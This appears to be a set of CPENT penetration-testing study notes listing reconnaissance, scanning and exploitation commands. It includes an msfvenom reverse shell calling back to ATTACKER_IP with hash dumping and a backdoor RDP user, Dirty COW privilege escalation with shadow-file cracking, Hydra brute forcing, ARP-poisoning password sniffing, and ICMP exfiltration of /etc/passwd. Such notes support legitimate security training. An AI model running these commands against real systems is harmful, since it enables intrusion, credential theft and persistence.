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Created January 11, 2023 23:20
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CPENT pentesting notes


The whole framework.

Subdomain Enumeration

  • SubBrute:
  • nmap --script dns-brute
  • dnsmap
  • fierce -dns
  • python3 -d -p 80 -e Bing

Similar Domains


  • allintitle: restricts the results to those pages containing all the query terms specified in the title
  • allintext: searches pages with content specified in search criteria - inurl: restricts the results to those pages containing the word specified in the URL - allinurl: restricts the results to those pages containing all the query terms specified in the URL
  • link: searches websites or pages that contain links to the specified website or page - info: finds information for the specified web page - related: displays websites that are similar or related to the specified URL - cache: displays Google’s cached version of a web page, instead of the current version of the web page
  • location: finds information for a specific location - define: finds definitions of words, phrases, and acronyms - filetype: allows searching based on a file extension - id: an undocumented alias for info - inanchor: restricts results to those pages containing the query terms specified in the anchor text on links to the page
  • allinanchor: restricts results to those pages containing all query terms specified in the anchor text on links to the page
  • author: restricts Google Groups results to include newsgroup articles by the specified author; the author can be a full or partial name or email address
  • group: restricts Google Groups results to newsgroup articles from certain groups or subareas
  • insubject: restricts articles in Google Groups to those that contain the specified terms - intext: restricts results to documents containing the term in the text - source: restricts results to articles from the news source with the specified ID


  • nmap -sn --script ip-geolocation-*

Data Harvesting

  • Gathering info on employees: theharvester -d -l 500 -b google (linkedin) -h result.html
  • Searching for doc and pdf files: -d -t doc,docx,pdf,xlsx,xls,ppt,pptx -l 100 -n 10 -o output -f result.html
  • phishingfrenzy to enumerate search engines for emails
  • haveibeenpwned
  • pastebin

People Search




  • dnsrecon -d
  • dnsenum -enum
  • dig (+short for IP)
  • dnsrecon -r (reverse lookup on an IP range)
  • Reverse IP/domain check
  • DNS zone transfer:
    • dig ns
    • dig axfr
    • dnsrecon -t axfr -d

Network Drawing

  • traceroute ip
  • nmap --traceroute --script traceroute-geolocation
  • SmartDraw, Gliffy, etc. to draw the topological map

Other OSINT Helper Tools

  • Maltego
  • fsociety (osint, passowrd attacks, wireless testing, exploitation tools, sniffing, spoofing, web hacking, post exploitation)
  • pentmenu (recon, dos, extraction)


  • domains/subdomains
  • location
  • employess
  • phone numbers, emails
  • products/services
  • network devices
  • website directories
  • public IP address block
  • DNS records

Identify possible attack surfaces.

Social Engineering

  • Rules of Engagement (RoE)
  • Be aware of local laws in the region before conducting SE


  • Phishing
  • Spear phishing
  • Whaling
  • Pharming


  • Vishing
  • SMSishing

Physical Vectors

  • Piggybacking/Tailgating
  • Eavesdropping
  • Sholder surfing
  • Baiting/media dropping
  • Dumpster diving
  • Reverse social engineering
  • Elicitation techniques
  • Motivation techniques

Phishing Vendors

  • OhPhish
  • ShellPhishing
  • Phishing Frenzy
  • LUCY
  • SET
  • SpeedPhish Framework
  • Gophish


  • Name and employee ID
  • Emails and passwords
  • SSN
  • Addresses, phone numbers
  • PII, sensitive info

External Network Pentesting

  • Detect unnecessary open ports
  • Firewall bypass testing
  • IDS evasion testing
  • Testing switching and routing issues

Network Pentest Process

  1. OSINT
  2. Port scanning
  3. OS and service fingerprinting
  4. Vulnerability research
  5. Exploit verifitication
  6. Reporting


  • Quick ping scan: sudo nmap -sn
  • sudo netdiscover -i eth0 -p (passive)
  • sudo netdiscover -i eth0 -r (active)
  • ICMP ping scan: nmap -sP IP
  • SYN scan: nmap -sS -P0 IP
  • All ports SYN scan: nmap -sS -p- -P0 -max-rtt-timeout <time> IP
  • Specific port SYN scan: nmap -sS -p80,443 -P0 IP
  • Fragmentation scan: nmap -sS -A -f IP
  • OS scan: nmap -O -F IP
  • Scan for patches
  • sudo hping3 --scan known -S (known ports from /etc/services)
  • sudo hping3 --scan '0-3000' -S (scan a port range)

Web Scans

  • Website info: sudo whatweb
  • Wordpress scan: sudo wpscan --url --enumerate u (users)
  • Wordpress scan: sudo wpscan --url --enumerate t (themes)
  • Wordpress scan: sudo wpscan --url --enumerate p (plugins)
  • msfconsole:
    • load wmap
    • wmap_sites -a (add a site)
    • wmap_targets -t IP_of_the_site (add a target)
    • wmap_run -t (load modules based on the site)
    • wmap_run -e (run the assessment)
    • vulns (display vulnerabilities)
  • Nikto
  • Vega

OS Fingerprinting

  • Passive: sudo p0f -i any -p -o /tmp/sniff.log (-p for promiscuous)
  • sudo nmap -O IP
  • dmitry -pf IP
  • dmitry -pb IP (b for banner grab)

Send Files Using ICMP

For any ASCII file to be sent over the network as ICMP:

  1. Listening window on the server: sudo hping3 --listen signature --safe --icmp
  2. On the client to send to the server: sudo hping3 IP --icmp -d 100 --sign signature --file /etc/passwd

Convert XML nmap output to HTML

xsltproc -o ~/scanresults.html /usr/share/nmap/nmap.xsl scan.xml

Target Database

  1. Host/IP
  2. OS
  3. Ports
  4. Services
  5. Vulnerabilities
  6. Exploit
  7. Notes
  8. Priority

Vulnerability Research

  • Google Hacking DB
  • National Vulnerability Database
  • Exploit DB
  • CVE
  • Vulmon
  • searchsploit -t Windows Server 2008
  • searchsploit Windows Server 2008 | grep -i local
  • searchsploit Windows Server 2008 | grep -v kernel

Example: SMB Enumeration

  • nmap --script smb-os-discovery IP
  • nmap -sC IP (default script scan)
  • SMB exploit on Win 7 (eternalblue):
    • nmap --script=smb-os-discovery -p 445 IP
    • Open msfconsole:
      1. use auxiliary/scanner/smb/smb_ms17_010
      2. set rhosts IP
      3. set processinject lsass.exe (optional)
      4. run

Example: RPC and NFS shares

  1. nmaps -T4 -A IP
  2. Focus on RPC, NFS, and mountd services.
  3. rpcinfo -p IP
  4. showmount -e IP (discover NFS shares listed in /etc/exports)
  5. sudo mount -t nfs /mnt -o nolock (-t specifies the type of the file system (nfs). Specifying nolock disables the file locking)
  6. Try to access and remove files to confirm read/write.

Example: Enumerating Logged on Users Using Finger Protocol

  1. Check if Finger port is opened: nmap -p 79
  2. finger @
  3. finger Admin@
  4. Alternatively, use telnet: telnet 79 (type the username, e.g. Admin)
  5. Safeguard: disable Finger service by editing the finger text file in /etc/xinetd.d

Metasploit db_nmap

  1. sudo service postgresql start
  2. sudo msfdb init
  3. sudo msfconsole
  4. workspace -h
  5. Create a workspace workspace -a LPT
  6. db_nmap -sP IP
  7. Type services or hosts to examine the scan results from the workspace
  8. host -h to check on all available options
  9. use auxiliary/scanner/portscan/tcp
  10. hosts -c address,os_flavor -S Linux -R (-R inputs the hosts into the aux scanner's RHOSTS)
  11. run

ARP Poisoning, MITM, Password Sniffing

  1. Open Cain & Abel
  2. Configure Ethernet
  3. Select Sniffer and pick the Ethernet adapter
  4. Start sniffing
  5. In the Sniffer tab, Plus (+) icon (or) right click in the window, select Scan MAC Addresses to scan the network for hosts
  6. Select ARP (bottom-left corner) after getting the MAC addresses
  7. Click (+) to add a new ARP poison route
  8. Select two IPs that communicate (like FTP server and Ads Dept)
  9. Start ARP
  10. Check Passwords tab (bottom-left corner)

Weak Passwords Check Using L0phtCrack

  1. Install L0phtCrack on Windows
  2. Run it and extract passwords from weak NTLM hashes

FTP Dictionary Attack

  • hydra -L /root/Wordlists/Usernames.txt -P /root/Wordlists/Passwords.txt ftp://IP


  • OpenVAS for vulnerability scanning
  • Searchsploit (searchsploit openssl remote)
  • Copy metasploit modules:
    • to the appropriate folder, e.g. usr/share/metasploit-framework/modules/exploits/multi/http
    • reload_all inside of msfconsole
    • search new_exploit_name
  • Villain a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions

Windows Exploitation Example

  1. msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' lhost=ATTACKER_IP lport=443 -f exe > /home/pentester/Desktop/shikata.exe (reverse meterpreter shell)
  2. service apache2 start (for sharing files with remote users)
  3. mkdir /var/www/html/share
  4. chmod -R 755 /var/www/html/share/
  5. cp /home/pentester/Desktop/shikata.exe /var/www/html/share
  6. msfconsole
  7. use exploit/multi/handler
  8. set payload windows/meterpreter/reverse_tcp
  9. set lhost ATTACKER_IP
  10. set lport 443
  11. exploit
  12. getsystem
  13. run post/windows/gather/hashdump
  14. run getgui -e (enables the remote desktop connection to the machine)
  15. run getgui -u POPS -p frasporD@123 (create a user POPS)
  16. xfreerdp /u:POPS /p:frasporD@123 /v:TARGET_IP

To crack the hashes, use JohnTheRipper (run export CPUID_DISABLE=1 before using john) or hashcat: sudo john --format=nt /home/pentester/Desktop/hashes.txt

Linux Exploitation Example

  1. Brute force SSH: hydra -L /home/pentester/Wordlists/Usernames.txt -P /home/pentester/Wordlists/Passwords.txt TARGET_IP ssh
  2. Connect to the target machine, run uname -a and lsb_release -a to get Linux distro info and version
  3. Test if you can switch to root: sudo su
  4. searchsploit dirty cow
  5. Copy the exploit to the root folder: searchsploit -m linux/local/40847.cpp
  6. Copy the contents of the file into a file on the target machine
  7. Compile the code: g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
  8. ./dcow -s
  9. cat /etc/passwd (save the content into a file for cracking password hashes)
  10. cat /etc/shadow (save this to another file)
  11. unshadow password.txt shadow.txt > unshadowed.txt
  12. export CPUID_DISABLE=1
  13. sudo john unshadowed.txt

Internal Network Pentesting


  • Identify internal domains: net view /domain
  • List of files/print shares: net view \\ computername
  • List of files/print shares including hidden: net view \\ computername /all
  • List of shares on a Netware PC: net view /network:nw
  • Find the domain name: systeminfo | findstr /B /C:"Domain"\
  • Find the logged in user's domain: echo %userdomain%
  • WMIC to find the domain: wmic computersystem get domain
  • List all available servers on the domain: net view /domain: [domain name]

Internal Network Mapping

  • arp -a
  • ipconfig
  • nmap
  • Soft Perfect Network Scanner
  • MyLanViewer
  • SolarWinds IP network brows
  • Active mode: netdiscover -r
  • Passive mode: netdiscover -p
  • Bettercap

Cool Paid Industry Tools

  • Bruteratel a customized C2 for red team and adversary simulation
  • CobaltStrike adversary simulation and red team operations
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